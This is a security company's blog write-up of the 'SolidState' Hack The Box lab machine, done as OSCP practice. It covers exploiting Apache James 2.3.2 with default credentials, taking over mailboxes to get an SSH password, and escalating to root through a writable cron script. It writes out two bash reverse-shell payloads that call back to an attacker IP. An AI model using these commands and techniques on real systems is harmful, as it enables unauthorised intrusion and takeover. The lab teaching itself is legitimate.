Road to OSCP - Hack The Box Write Up - Solidstate

Blog

17
- Febr
2020
Posted by: Ángel Guzmán
[Cybersecurity & hacking tools and techniques]
Road to OSCP - Hack The Box Write Up - Solidstate

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

SolidState

Initial Foothold

After a normal enumeration we find nothing of interest. We need to run a full nmap scan, which will yield a new port: 4555 rsip.

Then we do nmap -sC -sV -p 4555 10.10.10.51, which outputs the following: 4555/tcp open james-admin JAMES Remote Admin 2.3.2.

Googling about james remote admin 2.3.2 we find a python exploit for James Server 2.3.2 with RCE. Pull the exploit: searchsploit -x 35513.py and rename it: mv 35513.py exploit.py.

It looks like the payload for the exploit executes once an user logs in, so we need to find how to do that first.

Analyzing the exploit, we see that it access the James Remote Admin with the default credentials root:root. We can access it ourselves by doing: telnet 10.10.10.51 4555.

User

Once there, we can use help to list the available commands. One of them stands out: listusers, which outputs a list of users. From here, we can try resetting their passwords with the command setpassword [username] [password].

We reset everyones password to their own name, e.g., james:james. We can now access their mailboxes using the POP3 protocol. None of them have anything relevant except mindy.

  1. telnet 10.10.10.51 110
  2. USER mindy
  3. PASS mindy
  4. LIST -> Outputs 2 emails.

The second email holds mindy's ssh credentials.

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first
login.  Your access is restricted at the moment, feel free to ask your supervisor to add any
commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

Password for user mindy is: P@55W0rd1!2@. We can now log in as mindy through ssh: ssh mindy@10.10.10.51.

Root

If we do cat /etc/passwd we will see that mindy's shell is /bin/rbash, which is a restricted shell.

However, since we can log in now, we can trigger the payload of the python script we found earlier. Change the payload to: '[ "$(id -u)" == "0" ] && bash -c "bash -i >& /dev/tcp/10.10.14.44/12345 0>&1"'

Now, to trigger the payload:

  1. Run the script (python2): python exploit.py 10.10.10.51.
  2. Set up the listener: ncat -lnvp 12345.
  3. Log in through ssh: ssh mindy@10.10.10.51.

We get an unrestricted shell as mindy.

Downloading and running bash lse.sh -l1 we see that we have write access to /opt/tmp.py. Doing a quite test with an os.system("touch /tmp/test.txt") reveals that the script is being run by root THREE minutes.

Change the command by: os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.44/6969 0>&1'") set up a listener and wait for the root shell to spawn.

tags
Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.
RECENT POSTS
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
Jan 17, 2025
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
jtsec & Applus+ Laboratories at ICCC24
Nov 14, 2024
jtsec & Applus+ Laboratories at ICCC24
How to use the CCN product catalog to improve your company's security
Oct 14, 2024
How to use the CCN product catalog to improve your company's security
Common Criteria Statistics 2023
June 17, 2024
Common Criteria Statistics 2023
How to enter ENS category high, stay in the catalog and add new versions of my product
April 23, 2024
How to enter ENS category high, stay in the catalog and add new versions of my product
jtsec - Our LINCE 2023
Febr 6, 2024
jtsec - Our LINCE 2023
We wish you a happy and cybersecure 2024
Dec 19, 2023
We wish you a happy and cybersecure 2024
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
Dec 14, 2023
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
How to include your product or service in ENS ALTA.
Oct 31, 2023
How to include your product or service in ENS ALTA.
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
Sept 19, 2023
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
CATEGORIES